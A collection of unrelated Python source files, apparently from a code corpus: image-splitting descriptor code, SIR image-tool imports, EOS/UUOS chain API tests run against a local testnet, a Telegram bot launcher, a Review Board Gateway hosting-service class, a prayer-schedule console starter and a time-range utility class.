compression=descriptor_dict["compression"],
voxel_size=descriptor_dict["voxel_size"],
)
def to_dict(self):
"""Get a dictionary for the metadata for this subimage"""
return {"index": self.index,
"suffix": self.suffix,
"filename": self.filename,
"data_type": self.data_type,
"file_format": self.file_format,
"template": self.template,
"dim_order": self.axis.to_condensed_format(),
"compression": self.compression,
"msb": self.msb,
"voxel_size": self.voxel_size,
"ranges": self.ranges.ranges}
def __eq__(self, other):
if isinstance(other, self.__class__):
return self.__dict__ == other.__dict__
return False
def __ne__(self, other):
return not self.__eq__(other)
def write_descriptor_file(descriptors_in, descriptors_out, filename_out_base,
test=False):
"""Saves descriptor files"""
dict_in = convert_to_dict(descriptors_in)
dict_out = convert_to_dict(descriptors_out)
descriptor = {"appname": "ImageSplit data", "version": "1.0",
"split_files": dict_out,
"source_files": dict_in}
descriptor_output_filename = filename_out_base + "_info.imagesplit"
if not test:
write_json(descriptor_output_filename, descriptor)
# pylint: disable=too-many-arguments
def generate_output_descriptors(filename_out_base,
max_block_size_voxels,
overlap_size_voxels,
dim_order,
header,
output_type,
num_dims,
output_file_format,
image_size,
msb,
compression,
voxel_size):
"""Creates descriptors representing file output"""
max_block_size_voxels_array = convert_to_array(max_block_size_voxels,
"block size", num_dims)
overlap_voxels_size_array = convert_to_array(overlap_size_voxels,
"overlap size", num_dims)
ranges = ranges_for_max_block_size(image_size, max_block_size_voxels_array,
overlap_voxels_size_array)
extension = FormatFactory.get_extension_for_format(output_file_format)
descriptors_out = []
index = 0
for subimage_range in ranges:
suffix = "" if len(ranges) <= 1 else \
"_" + '{0:04d}'.format(index)
output_filename_header = filename_out_base + suffix + extension
file_descriptor_out = SubImageDescriptor(
filename=output_filename_header,
file_format=output_file_format,
ranges=subimage_range,
suffix=suffix,
index=index,
dim_order_condensed=dim_order,
data_type=output_type,
template=copy.deepcopy(header),
msb=msb,
compression=compression,
voxel_size=voxel_size
)
descriptors_out.append(file_descriptor_out)
index += 1
return descriptors_out
def load_descriptor(descriptor_filename):
"""Loads and parses a file descriptor from disk"""
data = read_json(descriptor_filename)
if data["appname"] != "ImageSplit data":
raise ValueError('Not an ImageSplit file')
if data["version"] != "1.0":
raise ValueError('Cannot read this file version')
return data
def header_from_descriptor(descriptor_filename, filename_override):
"""Create a file header based on descriptor information"""
descriptor = load_descriptor(descriptor_filename)
original_file_list = descriptor["source_files"]
if len(original_file_list) != 1:
raise ValueError(
'This function only supports data derived from a single file')
original_file_descriptor = original_file_list[0]
file_format = FormatFactory.simplify_format(
original_file_descriptor["file_format"])
if file_format == "mhd":
original_header = load_mhd_header(original_file_descriptor["filename"])
else:
original_header = None # ToDo
input_file_list = descriptor["split_files"]
if filename_override:
input_file_base, extension = os.path.splitext(filename_override)
for input_file in input_file_list:
# old_filename = input_file["filename"]
filename = input_file_base + input_file["suffix"] + extension
input_file["filename"] = filename
descriptors = convert_to_descriptors(input_file_list)
global_descriptor = _aggregate_global_descriptor(descriptors)
return original_header, descriptors, global_descriptor
def generate_input_descriptors(input_file, start_index):
"""Create descriptors for one or more input files that do not have a
descriptor file"""
format_factory = FormatFactory()
input_file_base, extension = os.path.splitext(input_file)
descriptors = []
current_ranges = None
combined_header = None
full_image_size = None
if start_index is None:
# If no start index is specified, load a single header file
file_index = 0
format_str = ""
else:
# Load a series of files starting with the specified prefix
file_index = start_index
format_str = _get_format_string(extension, input_file_base, start_index)
suffix = format_str.format(start_index)
header_filename = input_file_base + suffix + extension
if not os.path.isfile(header_filename):
raise ValueError(
'No file series found starting with ' + header_filename)
# Loop through all the input files
while True:
file_descriptor, current_header = parse_header(header_filename,
format_factory)
data_type = file_descriptor.data_type
dim_order = file_descriptor.dim_order
file_format = file_descriptor.file_format
current_image_size = file_descriptor.image_size
voxel_size = file_descriptor.voxel_size
msb = file_descriptor.msb
compression = file_descriptor.compression
# Reorder image size and voxel size dimensions
axis = Axis.from_condensed_format(dim_order)
current_image_size = \
np.take(current_image_size, axis.reverse_dim_order).tolist()
voxel_size = np.take(voxel_size, axis.reverse_dim_order).tolist()
if not current_ranges:
full_image_size = copy.deepcopy(current_image_size)
combined_header = copy.deepcopy(current_header)
current_ranges = [[0, current_image_size[0] - 1, 0, 0],
[0, current_image_size[1] - 1, 0, 0],
[0, current_image_size[2] - 1, 0, 0]]
else:
# For multiple input files, concatenate volumes
if current_image_size[0] != full_image_size[0]:
raise ValueError(
'When loading without a descriptor file, the first '
'dimension of each file must '
'match')
if current_image_size[1] != full_image_size[1]:
raise ValueError(
'When loading without a descriptor file, the second '
'dimension of each file must '
'match')
full_image_size[2] = full_image_size[2] + current_image_size[2]
current_ranges[2][0] = current_ranges[2][1] + 1
current_ranges[2][1] = current_ranges[2][1] + \
current_image_size[2]
# Create a descriptor for this subimage
ranges_to_write = copy.deepcopy(current_ranges)
descriptors.append(SubImageDescriptor(
index=file_index,
suffix=suffix,
filename=header_filename,
ranges=ranges_to_write,
template=combined_header,
data_type=data_type,
dim_order_condensed=dim_order,
file_format=file_format,
msb=msb,
compression=compression,
voxel_size=voxel_size
))
if start_index is None: # pylint: disable=no-else-break
# Single file already loaded, so terminate the while True loop
break
else:
# Search for next file, and if not found terminate the loop
file_index += 1
suffix = format_str.format(file_index)
header_filename = input_file_base + suffix + extension
if not os.path.isfile(header_filename):
break
full_image_size = np.array(full_image_size).tolist()
global_descriptor = _aggregate_global_descriptor(descriptors)
# Update the combined image size
combined_header["DimSize"] = full_image_size
# Update voxel size
combined_header["ElementSize"] = voxel_size
return combined_header, descriptors, global_descriptor
def _aggregate_global_descriptor(descriptors):
global_ranges = None
combined_dim_order = None
combined_file_format = None
data_type = None
msb = None
voxel_size = None
for descriptor in descriptors:
current_ranges = descriptor.ranges.ranges
if not global_ranges:
global_ranges = copy.deepcopy(current_ranges)
else:
global_ranges[0][0] = min(global_ranges[0][0], current_ranges[0][0])
global_ranges[0][1] = max(global_ranges[0][1], current_ranges[0][1])
global_ranges[1][0] = min(global_ranges[1][0], current_ranges[1][0])
global_ranges[1][1] = max(global_ranges[1][1], current_ranges[1][1])
global_ranges[2][0] = min(global_ranges[2][0], current_ranges[2][0])
global_ranges[2][1] = max(global_ranges[2][1], current_ranges[2][1])
if not combined_file_format:
combined_file_format = descriptor.file_format
if not combined_dim_order:
combined_dim_order = descriptor.axis.to_condensed_format()
if not data_type:
data_type = descriptor.data_type
if not msb:
msb = descriptor.msb
if not voxel_size:
voxel_size = copy.deepcopy(descriptor.voxel_size)
full_image_size = [global_ranges[0][1] - global_ranges[0][0] + 1,
global_ranges[1][1] - global_ranges[1][0] + 1,
global_ranges[2][1] - global_ranges[2][0] + 1]
full_image_size = np.array(full_image_size).tolist()
global_descriptor = GlobalImageDescriptor(
size=full_image_size,
file_format=combined_file_format,
dim_order_condensed=combined_dim_order,
data_type=data_type,
msb=msb,
voxel_size=voxel_size)
return global_descriptor
def convert_to_descriptors(descriptors_dict):
"""Convert descriptor dictionary to list of SubImageDescriptor objects"""
descriptors_sorted = sorted(descriptors_dict, key=lambda k: k['index'])
desc = [SubImageDescriptor.from_dict(d) for d in descriptors_sorted]
return desc
def convert_to_dict(descriptors):
"""Convert SubImageDescriptor objects to descriptor dictionary"""
return [d.to_dict() for d in descriptors]
def parse_header(filename, factory):
"""Read metadata from any supported header type"""
# pylint: disable=unused-variable
header_base, extension = os.path.splitext(filename)
format_string = factory.extension_to_format(extension)
return factory.get_factory(format_string).load_and_parse_header(filename)
def _get_format_string(extension, input_file_base, start_index):
for num_zeros in range(10, -1, -1):
format_str = '{0:0' + str(num_zeros) + 'd}'
suffix_test = format_str.format(start_index)
header_filename = input_file_base + suffix_test + extension
if os.path.isfile(header_filename):
break
return format_str
|
# -*- coding:utf-8 -*-
from .printsirhead import printsirhead
from .loadsir import loadsir
from .extractsirhead import extractsirhead
from .sirutils import parseFilename
from .sirutils import fn2dt
from .latlon2pix import latlon2pix
from .ease2helper import ease2_map_info, easeconv_normalize_degrees
|
# use subprocess.call to run external file
# which in this case is input_output, a test Rust file
import subprocess
subprocess.call(["./input_output"])
|
import os
import sys
import time
import json
import pytest
import logging
import hashlib
from uuoskit import uuosapi, config, wallet
from uuoskit.chainapi import ChainApiAsync
from uuoskit.exceptions import ChainException, WalletException
from uuoskit.testnet import Testnet
Testnet.__test__ = False
logging.basicConfig(level=logging.INFO, format='%(asctime)s %(levelname)s %(lineno)d %(module)s %(message)s')
logger=logging.getLogger(__name__)
test_dir = os.path.dirname(__file__)
# config.main_token = 'UUOS'
# config.main_token_contract = 'uuos.token'
# config.system_contract = 'uuos'
# uuosapi.set_node('http://127.0.0.1:8899')
# config.setup_uuos_network()
uuosapi_async = None
class TestUUOSApi(object):
@classmethod
def setup_class(cls):
uuosapi.set_node('http://127.0.0.1:9000')
uuosapi_async = ChainApiAsync('http://127.0.0.1:9000')
cls.testnet = Testnet(single_node=True, show_log=False)
cls.testnet.run()
cls.info = uuosapi.get_info()
# logger.info(cls.info)
cls.chain_id = cls.info['chain_id']
# wallet.import_key('mywallet', '5K463ynhZoCDDa4RDcr63cUwWLTnKqmdcoTKTHBjqoKfv4u5V7p')
# wallet.import_key('mywallet', '5Jbb4wuwz8MAzTB9FJNmrVYGXo4ABb7wqPVoWGcZ6x8V2FwNeDo')
@classmethod
def teardown_class(cls):
cls.testnet.stop()
cls.testnet.cleanup()
def setup_method(self, method):
global uuosapi_async
uuosapi_async = ChainApiAsync('http://127.0.0.1:9000')
def teardown_method(self, method):
pass
def test_gen_transaction(self):
args = {
'from': 'alice',
'to': 'bob',
'quantity': '1.0000 UUOS',
'memo': 'hello,world'
}
a = ['eosio.token', 'transfer', args, {'alice': 'active'}]
r = uuosapi.generate_transaction([a], 60, self.info['last_irreversible_block_id'])
logger.info(r)
assert r
r = uuosapi_async.generate_transaction([a], 60, self.info['last_irreversible_block_id'])
logger.info(r)
assert r
args = {
'from': 'alice',
'to': 'bob',
'quantity': '1.0000 UUOS',
'typo_memo': 'hello,world'
}
a = ['eosio.token', 'transfer', args, {'alice': 'active'}]
with pytest.raises(Exception):
r = uuosapi.generate_transaction([a], 60, self.info['last_irreversible_block_id'])
with pytest.raises(Exception):
r = uuosapi_async.generate_transaction([a], 60, self.info['last_irreversible_block_id'])
@pytest.mark.asyncio
async def test_sign_transaction(self):
trx = '{"expiration":"2021-04-13T04:05:10","ref_block_num":6467,"ref_block_prefix":2631147246,"max_net_usage_words":0,"max_cpu_usage_ms":0,"delay_sec":0,"context_free_actions":[],"actions":[{"account":"eosio.token","name":"transfer","authorization":[{"actor":"testaccount","permission":"active"}],"data":"00f2d4142193b1ca0000000000ea3055e80300000000000004454f53000000000568656c6c6f"}],"transaction_extensions":[],"signatures":[],"context_free_data":[]}'
priv_key = '5K463ynhZoCDDa4RDcr63cUwWLTnKqmdcoTKTHBjqoKfv4u5V7p'
r = uuosapi.sign_transaction(trx, priv_key, self.info['chain_id'])
logger.info(r)
r = uuosapi_async.sign_transaction(trx, priv_key, self.info['chain_id'])
trx = '{"expiration":"2021-04-13t04:05:10","ref_block_num":6467,"ref_block_prefix":2631147246,"max_net_usage_words":0,"max_cpu_usage_ms":0,"delay_sec":0,"context_free_actions":[],"actions":[{"account":"eosio.token","name":"transfer","authorization":[{"actor":"testaccount","permission":"active"}],"data":"00f2d4142193b1ca0000000000ea3055e80300000000000004454f53000000000568656c6c6f"}],"transaction_extensions":[],"signatures":[],"context_free_data":[]}'
priv_key = '5K463ynhZoCDDa4RDcr63cUwWLTnKqmdcoTKTHBjqoKfv4u5V7p'
with pytest.raises(ChainException):
r = uuosapi.sign_transaction(trx, priv_key, self.info['chain_id'])
logger.info(r)
with pytest.raises(ChainException):
uuosapi_async.sign_transaction(trx, priv_key, self.info['chain_id'])
@pytest.mark.asyncio
async def test_pack_transaction(self):
trx = '{"expiration":"2021-04-13T04:05:10","ref_block_num":6467,"ref_block_prefix":2631147246,"max_net_usage_words":0,"max_cpu_usage_ms":0,"delay_sec":0,"context_free_actions":[],"actions":[{"account":"eosio.token","name":"transfer","authorization":[{"actor":"testaccount","permission":"active"}],"data":"00f2d4142193b1ca0000000000ea3055e80300000000000004454f53000000000568656c6c6f"}],"transaction_extensions":[],"signatures":[],"context_free_data":[]}'
r = uuosapi.pack_transaction(trx, True)
logger.info(r)
assert r
r = uuosapi.pack_transaction(trx, False)
logger.info(r)
assert r
r = uuosapi_async.pack_transaction(trx, True)
logger.info(r)
assert r
r = uuosapi_async.pack_transaction(trx, False)
logger.info(r)
assert r
@pytest.mark.asyncio
async def test_basic(self):
priv_key = '5K463ynhZoCDDa4RDcr63cUwWLTnKqmdcoTKTHBjqoKfv4u5V7p'
pub = uuosapi.get_public_key(priv_key)
logger.info(pub)
assert pub == uuosapi.get_public_key_prefix() + '8Znrtgwt8TfpmbVpTKvA2oB8Nqey625CLN8bCN3TEbgx86Dsvr'
key = uuosapi.create_key()
logger.info(key)
assert key
@pytest.mark.asyncio
async def test_get_table_rows(self):
symbol = uuosapi.string_to_symbol(4, 'EOS')
symbol_code = symbol >> 8
symbol_code = uuosapi.n2s(symbol_code)
r = uuosapi.get_table_rows(True, 'eosio.token', symbol_code, 'stat', '', '', 10)
logger.info(r)
assert r['rows']
r = uuosapi.get_table_rows(True, 'eosio.token', 'helloworld11', 'accounts', '', '', 10)
logger.info(r)
assert r['rows']
r = await uuosapi_async.get_table_rows(True, 'eosio.token', symbol_code, 'stat', '', '', 10)
logger.info(r)
assert r['rows']
r = await uuosapi_async.get_table_rows(True, 'eosio.token', 'helloworld11', 'accounts', '', '', 10)
logger.info(r)
assert r['rows']
@pytest.mark.asyncio
async def test_get_account(self):
a = uuosapi.get_account('learnfortest')
assert a
logger.info(a)
a = await uuosapi_async.get_account('learnfortest')
assert a
logger.info(a)
logger.info('++++++++%s', uuosapi.s2n('notexists.a'))
a = uuosapi.get_account('notexists')
assert not a
a = await uuosapi_async.get_account('notexists')
assert not a
with pytest.raises(ChainException):
a = await uuosapi_async.get_account('notexists...')
assert not a
logger.info(a)
def test_chain_exception(self):
try:
raise ChainException('oops!')
except ChainException as e:
assert not e.json
try:
raise ChainException('{"a":1}')
except ChainException as e:
assert e.json
try:
raise ChainException({"a":1})
except ChainException as e:
assert e.json
def test_deploy_python_code_sync(self):
uuosapi.set_node('http://127.0.0.1:9000')
code = '''
import chain
def apply(a, b, c):
data = chain.read_action_data()
print(data)
'''
account = 'helloworld11'
config.python_contract = account
code = uuosapi.mp_compile(account, code)
uuosapi.deploy_python_contract(account, code, b'')
r = uuosapi.push_action(account, 'sayhello', b'hellooo,world', {account:'active'})
console = r['processed']['action_traces'][0]['console']
logger.info(console)
assert console == "b'hellooo,world'\r\n"
r = uuosapi.push_action(account, 'sayhello', b'goodbye,world', {account:'active'})
console = r['processed']['action_traces'][0]['console']
logger.info(console)
assert console == "b'goodbye,world'\r\n"
@pytest.mark.asyncio
async def test_deploy_python_code_async(self):
uuosapi_async = ChainApiAsync('http://127.0.0.1:9000')
code = '''
import chain
def apply(a, b, c):
data = chain.read_action_data()
print(data)
return
'''
account = 'helloworld11'
code = uuosapi_async.mp_compile(account, code)
async def run_code(code):
await uuosapi_async.deploy_python_contract(account, code, b'')
r = await uuosapi_async.push_action(account, 'sayhello', b'hellooo,world', {account:'active'})
console = r['processed']['action_traces'][0]['console']
assert console == "b'hellooo,world'\r\n"
r = await uuosapi_async.push_action(account, 'sayhello', b'goodbye,world', {account:'active'})
console = r['processed']['action_traces'][0]['console']
assert console == "b'goodbye,world'\r\n"
await run_code(code)
@pytest.mark.asyncio
async def test_pack_unpack_args(self):
from uuoskit import ABI
args = {
'from': 'test1',
'to': 'test2',
'quantity': '0.0100 EOS',
'memo': 'hello'
}
r = ABI.pack_action_args('eosio.token', 'transfer', json.dumps(args))
logger.info(r)
r = uuosapi.pack_args('eosio.token', 'transfer', args)
assert r
logger.info(r)
r = uuosapi.pack_args('eosio.token', 'transfer', json.dumps(args))
assert r
r = uuosapi.unpack_args('eosio.token', 'transfer', r)
logger.info(r)
return
with pytest.raises(Exception):
r = uuosapi.unpack_args('eosio.token', 'transfer', {'a':1})
with pytest.raises(Exception):
r = uuosapi.unpack_args('eosio.token', 'transfer', json.dumps({'a':1}))
with pytest.raises(Exception):
r = uuosapi.unpack_args('eosio.token', 'transfer', b'hello')
with pytest.raises(Exception):
r = uuosapi.unpack_args('eosio.token', 'transfer', 'aabb')
def test_get_required_keys(self):
args = {
'from': 'helloworld11',
'to': 'helloworld12',
'quantity': '0.0100 EOS',
'memo': 'hello'
}
act = ['eosio.token', 'transfer', args, {'helloworld11': 'active'}]
chain_info = uuosapi.get_info()
reference_block_id = chain_info['head_block_id']
trx = uuosapi.generate_transaction([act], 60, reference_block_id)
keys = uuosapi.get_required_keys(trx, wallet.get_public_keys())
assert keys
chain_id = chain_info['chain_id']
trx = wallet.sign_transaction(trx, keys, chain_id, json=True)
assert trx['signatures']
# logger.info(trx)
def test_push_action(self):
r = uuosapi.push_action('hello', 'sayhello', b'hello')
print(r)
def test_push_actions(self):
args = {
'from': 'helloworld11',
'to': 'helloworld12',
'quantity': '0.0100 EOS',
'memo': 'hello'
}
a1 = ['eosio.token', 'transfer', args, {'helloworld11': 'active'}]
args = {
'from': 'helloworld12',
'to': 'helloworld11',
'quantity': '0.0100 EOS',
'memo': 'hello'
}
a2 = ['eosio.token', 'transfer', args, {'helloworld12': 'active'}]
balance1 = uuosapi.get_balance('helloworld11')
r = uuosapi.push_actions([a1, a2])
balance2 = uuosapi.get_balance('helloworld11')
logger.info('+++++%s, %s\n', balance1, balance2)
try:
uuosapi.push_action('token', 'transfer', args, {'helloworld11': 'active'})
except Exception as e:
assert e.args[0] == '[error] in main.transaction_add_action_[/Users/newworld/dev/uuoskit/src/uuoskit/lib.go:150] abi struct not found for token::transfer'
#test for comporessed transaction
uuosapi.push_action('eosio.token', 'transfer', args, {'helloworld12': 'active'}, compress=True)
def test_push_transactions(self):
test_account1 = 'helloworld11'
aa = []
args = {'from':test_account1, 'to':'eosio', 'quantity':f'0.1000 {config.main_token}', 'memo':'hello,world'}
a = ['eosio.token', 'transfer', args, {test_account1:'active'}]
aa.append(a)
args = {'from':test_account1, 'to':'eosio', 'quantity':f'0.2000 {config.main_token}', 'memo':'hello,world'}
a = ['eosio.token', 'transfer', args, {test_account1:'active'}]
aa.append(a)
bb = []
args = {'from':test_account1, 'to':'eosio', 'quantity':f'0.1000 {config.main_token}', 'memo':'hello,world'}
a = ['eosio.token', 'transfer', args, {test_account1:'active'}]
bb.append(a)
args = {'from':test_account1, 'to':'eosio', 'quantity':f'0.2000 {config.main_token}', 'memo':'hello,world'}
a = ['eosio.token', 'transfer', args, {test_account1:'active'}]
bb.append(a)
uuosapi.push_transactions([aa, bb])
def test_pack_tx(self):
tx = {"expiration":"1980-01-01T00:01:00","ref_block_num":8,"ref_block_prefix":584400311,"max_net_usage_words":0,"max_cpu_usage_ms":0,"delay_sec":0,"context_free_actions":[],"actions":[{"account":"eosio.token","name":"transfer","authorization":[{"actor":"helloworld11","permission":"active"}],"data":"10428a97721aa36a0000000000ea3055e80300000000000004454f53000000000b68656c6c6f2c776f726c64"},{"account":"eosio.token","name":"transfer","authorization":[{"actor":"helloworld11","permission":"active"}],"data":"10428a97721aa36a0000000000ea3055d00700000000000004454f53000000000b68656c6c6f2c776f726c64"}],"transaction_extensions":[]}
tx = json.dumps(tx)
from uuoskit import transaction
t = transaction.Transaction()
t.from_json(tx)
def test_crypto(self):
key_pair = uuosapi.create_key()
logger.info(key_pair)
def gen_tx(self):
args = {
'from': 'helloworld11',
'to': 'eosio',
'quantity': '0.0100 EOS',
'memo': 'hello'
}
action = ['eosio.token', 'transfer', args, {'helloworld11': 'active'}]
chain_info = uuosapi.get_info()
chain_id = chain_info['chain_id']
reference_block_id = chain_info['head_block_id']
tx = uuosapi.generate_transaction([action], 60, reference_block_id, chain_id)
return tx
def test_push_tx(self):
tx = self.gen_tx()
public_keys = ['EOS7sPDxfw5yx5SZgQcVb57zS1XeSWLNpQKhaGjjy2qe61BrAQ49o',]
info = uuosapi.get_info()
# account_info = uuosapi.get_account('helloworld11')
# logger.info(account_info)
signed_tx = wallet.sign_transaction(tx, public_keys, info['chain_id'])
logger.info(signed_tx)
r = uuosapi.push_transaction(signed_tx)
logger.info('+++++++++elapsed:%s', r['processed']['elapsed'])
def test_gen_tx(self):
tx = self.gen_tx()
logger.info(tx)
assert tx
def test_sign_tx(self):
from uuoskit.transaction import Transaction
tx = self.gen_tx()
logger.info(tx)
t = Transaction.from_json(tx)
pub_key = 'EOS6MRyAjQq8ud7hVNYcfnVPJqcVpscN5So8BhtHuGYqET5GDW5CV'
sign = t.sign(pub_key)
logger.info(sign)
logger.info(t.pack())
def test_unpack_tx(self):
from uuoskit.transaction import Transaction
tx = self.gen_tx()
logger.info(tx)
t = Transaction.from_json(tx)
pub_key = 'EOS6MRyAjQq8ud7hVNYcfnVPJqcVpscN5So8BhtHuGYqET5GDW5CV'
sign = t.sign(pub_key)
logger.info(sign)
tx = t.pack()
logger.info(tx)
tx = Transaction.unpack(tx['packed_trx'])
logger.info(tx)
def test_wallet_sign(self):
from uuoskit.transaction import Transaction
from uuoskit import wallet
tx = self.gen_tx()
pubs = ['EOS6MRyAjQq8ud7hVNYcfnVPJqcVpscN5So8BhtHuGYqET5GDW5CV']
tx = wallet.sign_transaction(tx, pubs, self.chain_id)
logger.info(tx)
def test_get_public_key(self):
priv = '5KQwrPbwdL6PhXujxW37FSSQZ1JiwsST4cqQzDeyXtP79zkvFD3'
pub_eos = uuosapi.get_public_key(priv)
pub_common = uuosapi.get_public_key(priv, False)
assert pub_eos == 'EOS6MRyAjQq8ud7hVNYcfnVPJqcVpscN5So8BhtHuGYqET5GDW5CV'
assert pub_common == 'PUB_K1_6MRyAjQq8ud7hVNYcfnVPJqcVpscN5So8BhtHuGYqET5BoDq63'
|
from telegram.ext import Updater
from .guest_handlers import guest_conv_handler
from .admin_handlers import admin_conv_handler
import logging
logging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO)
def bot_main(TOKEN: str):
updater = Updater(token=TOKEN, use_context=True)
dispatcher = updater.dispatcher
dispatcher.add_handler(guest_conv_handler)
dispatcher.add_handler(admin_conv_handler)
updater.start_polling()
updater.idle()
|
from __future__ import unicode_literals
import json
import logging
from django import forms
from django.utils import six
from django.utils.six.moves.urllib.error import HTTPError, URLError
from django.utils.translation import ugettext_lazy as _, ugettext
from reviewboard.hostingsvcs.errors import (AuthorizationError,
HostingServiceError)
from reviewboard.hostingsvcs.forms import HostingServiceForm
from reviewboard.hostingsvcs.service import HostingService
from reviewboard.scmtools.crypto_utils import (decrypt_password,
encrypt_password)
from reviewboard.scmtools.core import Branch, Commit
from reviewboard.scmtools.errors import FileNotFoundError, SCMError
class ReviewBoardGatewayForm(HostingServiceForm):
"""Hosting service form for Review Board Gateway.
Provide an additional field on top of the base hosting service form to
allow specification of the repository name.
"""
rbgateway_repo_name = forms.CharField(
label=_('Repository name'),
max_length=128,
required=True,
widget=forms.TextInput(attrs={'size': '60'}),
help_text=_('The name of the repository. This is the name '
'specified in the configuration file for rb-gateway.'))
class ReviewBoardGateway(HostingService):
"""Hosting service support for Review Board Gateway.
Review Board Gateway is a lightweight self-installed source hosting service
that currently supports Git repositories.
"""
name = 'Review Board Gateway'
form = ReviewBoardGatewayForm
self_hosted = True
needs_authorization = True
supports_repositories = True
supports_post_commit = True
supported_scmtools = ['Git']
repository_fields = {
'Git': {
'path': '%(hosting_url)s/repos/%(rbgateway_repo_name)s/path'
}
}
def check_repository(self, path, *args, **kwargs):
"""Check whether the repository exists."""
self._api_get(path)
def authorize(self, username, password, hosting_url, *args, **kwargs):
"""Authorize the Review Board Gateway repository.
Review Board Gateway uses HTTP Basic Auth, so this will store the
provided password, encrypted, for use in later API requests.
Similar to GitLab's API, Review Board Gateway will return a private
token on session authentication.
"""
try:
data, headers = self.client.json_post(
url=hosting_url + '/session',
username=username,
password=password)
except HTTPError as e:
if e.code == 404:
raise HostingServiceError(
ugettext('A Review Board Gateway server was not found at '
'the provided URL.'))
elif e.code == 401:
raise AuthorizationError(
ugettext('The username or password is incorrect.'))
else:
logging.warning('Failed authorization at %s: %s',
hosting_url + '/session', e, exc_info=1)
raise
self.account.data['private_token'] = \
encrypt_password(data['private_token'])
self.account.save()
def is_authorized(self):
"""Determine if the account has supported authorization tokens.
This will check if we have previously stored a private token for the
account. It does not validate that the token still works.
"""
return 'private_token' in self.account.data
def get_file(self, repository, path, revision, base_commit_id, *args,
**kwargs):
"""Get a file from ReviewBoardGateway.
This will perform an API request to fetch the contents of a file.
"""
url = self._get_file_url(repository, revision, base_commit_id, path)
try:
data, is_new = self._api_get(url)
return data
except (HTTPError, URLError) as e:
if e.code == 404:
raise FileNotFoundError(path, revision)
else:
logging.warning('Failed to get file from %s: %s',
url, e, exc_info=1)
raise SCMError(six.text_type(e))
def get_file_exists(self, repository, path, revision, base_commit_id,
*args, **kwargs):
"""Check whether a file exists in ReviewBoardGateway.
This will perform an API request to fetch the meta_data of a file.
"""
url = self._get_file_url(repository, revision, base_commit_id, path)
try:
self._api_head(url)
return True
except (HTTPError, URLError) as e:
if e.code == 404:
return False
else:
logging.warning('Failed to get file exists from %s: %s',
url, e, exc_info=1)
raise SCMError(six.text_type(e))
def get_branches(self, repository):
url = ('%s/repos/%s/branches' %
(self.account.hosting_url,
repository.extra_data['rbgateway_repo_name']))
try:
data, headers = self._api_get(url)
branches = json.loads(data)
results = []
for branch in branches:
results.append(Branch(id=branch['name'],
commit=branch['id'],
default=(branch['name'] == 'master')))
return results
except Exception as e:
logging.warning('Failed to get branches from %s: %s',
url, e, exc_info=1)
raise SCMError(six.text_type(e))
def get_commits(self, repository, branch=None, start=None):
if start is not None:
url = ('%s/repos/%s/branches/%s/commits?start=%s'
% (self.account.hosting_url,
repository.extra_data['rbgateway_repo_name'],
branch,
start))
else:
url = ('%s/repos/%s/branches/%s/commits'
% (self.account.hosting_url,
repository.extra_data['rbgateway_repo_name'],
branch))
try:
data, headers = self._api_get(url)
commits = json.loads(data)
results = []
for commit in commits:
results.append(Commit(commit['author'],
commit['id'],
commit['date'],
commit['message'],
commit['parent_id']))
return results
except Exception as e:
logging.warning('Failed to fetch commits from %s: %s',
url, e, exc_info=1)
raise SCMError(six.text_type(e))
def get_change(self, repository, revision):
url = ('%s/repos/%s/commits/%s'
% (self.account.hosting_url,
repository.extra_data['rbgateway_repo_name'],
revision))
try:
data, headers = self._api_get(url)
commit = json.loads(data)
return Commit(commit['author'],
commit['id'],
commit['date'],
commit['message'],
commit['parent_id'],
diff=commit['diff'])
except Exception as e:
logging.warning('Failed to fetch commit change from %s: %s',
url, e, exc_info=1)
raise SCMError(six.text_type(e))
def _get_file_url(self, repository, revision, base_commit_id=None,
path=None):
"""Get the URL for accessing the contents of a file.
A revision or a base commit id, path pair is expected to be provided.
By default, this will return the URL based on the revision, if both
are provided.
"""
if revision:
return ('%s/repos/%s/file/%s'
% (self.account.hosting_url,
repository.extra_data['rbgateway_repo_name'],
revision))
else:
return ('%s/repos/%s/commits/%s/path/%s'
% (self.account.hosting_url,
repository.extra_data['rbgateway_repo_name'],
base_commit_id,
path))
def _api_get(self, url):
"""Make a GET request to the Review Board Gateway API.
Delegate to the client's http_get function but first add a
PRIVATE-TOKEN in the header for authentication.
"""
try:
data, headers = self.client.http_get(
url,
headers={
'PRIVATE-TOKEN': self._get_private_token(),
})
return data, headers
except HTTPError as e:
if e.code == 401:
raise AuthorizationError(
ugettext('The login or password is incorrect.'))
elif e.code == 404:
raise
else:
logging.warning('Failed to execute a GET request at %s: %s',
url, e, exc_info=1)
raise
def _api_head(self, url):
"""Make a HEAD request to the Review Board Gateway API.
Delegate to the client's http_request function using the method
HEAD but first add a PRIVATE-TOKEN in the header for authentication.
"""
try:
data, headers = self.client.http_request(
url,
headers={
'PRIVATE-TOKEN': self._get_private_token(),
},
method='HEAD')
return headers
except HTTPError as e:
if e.code == 401:
raise AuthorizationError(
ugettext('The login or password is incorrect.'))
elif e.code == 404:
raise
else:
logging.warning('Failed to execute a HEAD request at %s: %s',
url, e, exc_info=1)
raise
def _get_private_token(self):
"""Return the private token used for authentication."""
return decrypt_password(self.account.data['private_token'])
|
from .parser import get_args
from .data import Tawqeetex
def console_start():
'''Retrieves the inputs from the console and starts the pdf schedule generation'''
args = get_args()
data = Tawqeetex(*args)
data.create_schedule()
print("The prayer time schedule has been generated successfully")
|
from __future__ import print_function
import math
from math import isnan, isinf
from datetime import datetime
__all__ = ['TimeRange', 'Runs']
class TimeRange(object):
__slots__ = ('start', 'duration', 'peak', 'tags')
def __init__(self, start, duration, peak=None, tags=None):
self.start = start
self.duration = duration
self.peak = peak
self.tags = tags
def copy(self):
return TimeRange(self.start, self.duration, self.peak, self.tags)
def intersects_range(self, other):
min_end = min(self.end, other.end)
max_start = max(self.start, other.start)
return max_start <= min_end
def add_tag(self, tag):
self.tags.add(tag)
def add_tags(self, tags):
self.tags.update(tags)
@property
def end(self):
return self.start + self.duration
@end.setter
def end(self, value):
self.duration = value - self.start
def to_dict(self):
return { 'start': self.start,
'duration': self.duration,
'peak': self.peak,
'tags': list(self.tags) if self.tags else [] }
@classmethod
def from_dict(cls, d):
return cls(d['start'], d['duration'], d['peak'], set(d.get('tags', [])))
def __repr__(self):
peak_str = ''
if self.peak is not None:
peak_str = '; peak {:.2f}'.format(self.peak)
tags_str = ''
if self.tags is not None and len(self.tags) > 0:
tags_str = '; tags ({})'.format(', '.join(self.tags))
return '<TimeRange {:.2f} - {:.2f}; duration {:.2f}s{}{}>'.format(self.start / 1000., self.end / 1000., self.duration / 1000., peak_str, tags_str)
